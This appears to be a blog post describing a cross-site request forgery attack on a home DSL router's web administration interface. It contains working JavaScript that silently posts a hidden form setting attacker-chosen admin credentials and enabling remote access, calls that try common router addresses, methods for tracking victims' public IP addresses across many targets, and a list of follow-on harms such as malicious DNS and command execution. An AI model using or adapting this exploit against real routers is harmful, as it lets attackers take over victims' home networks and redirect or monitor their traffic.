This is a known issue for a few years but its surprising that DSL modem/router manufacturers have still not fixed the issue(at least not mine ;)). My router's administration web server accepts HTTP POST requests from a user with an authenticated session without validating them against any token or checking the referrer section in the HTTP header. Thus, the router can accept requests originating from a user's browser irrespective of whether the request was generated voluntarily by the user from the router's web interface or if an automated script stored on another website generated that request on the user's behalf. The latter one is the risky condition we are talking about.
I wrote a small proof of concept javascript to craft a POST request to a specific URL of the router's web server in order to open the router to allow remote administration. This URL also accepts the credentials used for connecting remotely. Hence, the malicious script successfully pushes the username and password of the attacker's choice, using the victim's authenticated session with the DSL router.
The above part is very easy to perform and the victim's modem configured to welcome remote connections over the public network. The challenge for the attacker now is to find the public IP address of the victim, otherwise the above actions are of no use. Some techniques are possible:
1. Push settings for DDNS into the DSL router's configuration
2. Host a listener online which logs incoming connections' IP addresses and make the above malicious script place a sample request to this listener.
3. Include additional script to connect to a service like whatismyip.com and fetch the public ip address and post it on some anonymous board online(a little difficult to achieve due to browser restrictions)
The first one is manageable if the attack is targeted to one particular individual. If the router reboots or jumps IP addresses, the attacker can constantly keep a track. There are many free DDNS services available online and the attacker can maintain anonymity too.
The second one risks the attacker being identified due to the ownership of the listener service. But multiple victims can be targeted and maintained.
The third option provides both, anonymity and unlimited victims, but is very difficult to achieve due to browser restrictions. I am still working on a sample javascript to achieve it but there are a couple of things holding me back:
a. Response from whatismyip.com or any other service cannot be accessed by a script running on another domain.
b. I haven't yet found an anonymous online board which I can use to post messages using automated scripts. This is mainly due to the use of CAPTCHA or some other human verification tool being used by these services.
Another challenge is to guess the Private IP address of the DSL router, for the javascript to write configuration data successfully. The most common ones are 192.168.0.1, 192.168.1.1, 10.0.0.1, 10.0.1.1 and so on. All the most likely IP addresses can be targeted/brute forced. Finally, below is the script I wrote specifically for my router. It will vary depending on the model and make of the router.
<script type="text/javascript">
function post_to_url(router) {
method = "post";
var form = document.createElement("form");
form.setAttribute("method", method);
form.setAttribute("action", "http://" + router + "/remote_config");
//Post variables
var userid = document.createElement("input");
userid.setAttribute("type", "hidden");
userid.setAttribute("name", "__AdminUserID");
userid.setAttribute("value", "hacker");
form.appendChild(userid);
var password = document.createElement("input");
password.setAttribute("type", "hidden");
password.setAttribute("name", "__AdminPassword");
password.setAttribute("value", "hackerpass");
form.appendChild(password);
var timeoutdisable = document.createElement("input");
timeoutdisable.setAttribute("type", "hidden");
timeoutdisable.setAttribute("name", "TimeOut_Disable");
timeoutdisable.setAttribute("value", "on");
form.appendChild(timeoutdisable);
var enableremoteaccess = document.createElement("input");
enableremoteaccess.setAttribute("type", "hidden");
enableremoteaccess.setAttribute("name", "Enable_RemoteAccess");
enableremoteaccess.setAttribute("value", "on");
form.appendChild(enableremoteaccess);
document.body.appendChild(form);
form.submit();
}
</script>
The above script sets the POST parameters __AdminUserID, __AdminPassword, Timeout_Disable and Enable_RemoteAccess with the values of the attacker's choice and makes a POST request to the router's IP address. I have masked the actual parameters used by my DSL modem(for no reason at all ;)) but as long as you get the parameter names right, the attack surely works.
And the script can be called using the following:
<script>post_to_url("192.168.0.1")</script>
<script>post_to_url("192.168.1.1")</script>
<script>post_to_url("10.0.1.1")</script>
I also have a few wireless routers lying around with the dd-wrt firmware on them. Next, my goal is to test if a similar attack works on them too.
In conclusion, for this kind of an attack to work, there are numerous pre-conditions that might dictate the success or failure of such an attack:
1. Victim visits the malicious website
2. Victim has an authenticated session with the router's web interface
3. The modem has not changed its public IP address
4. The POST request contains the exact parameters required to make the change.
There can be more damaging effects of such an attack:
a. The DNS address is set to a malicious DNS server in the modem configuration
b. The ssid and network key of the router is modified
c. A denial of service attack is carried out by blocking access to certain public IPs/URLs on the internet
d. The dd-wrt firmware allows users to execute commands from the web interface, the attacker can craft an attack to run any command on the victim's router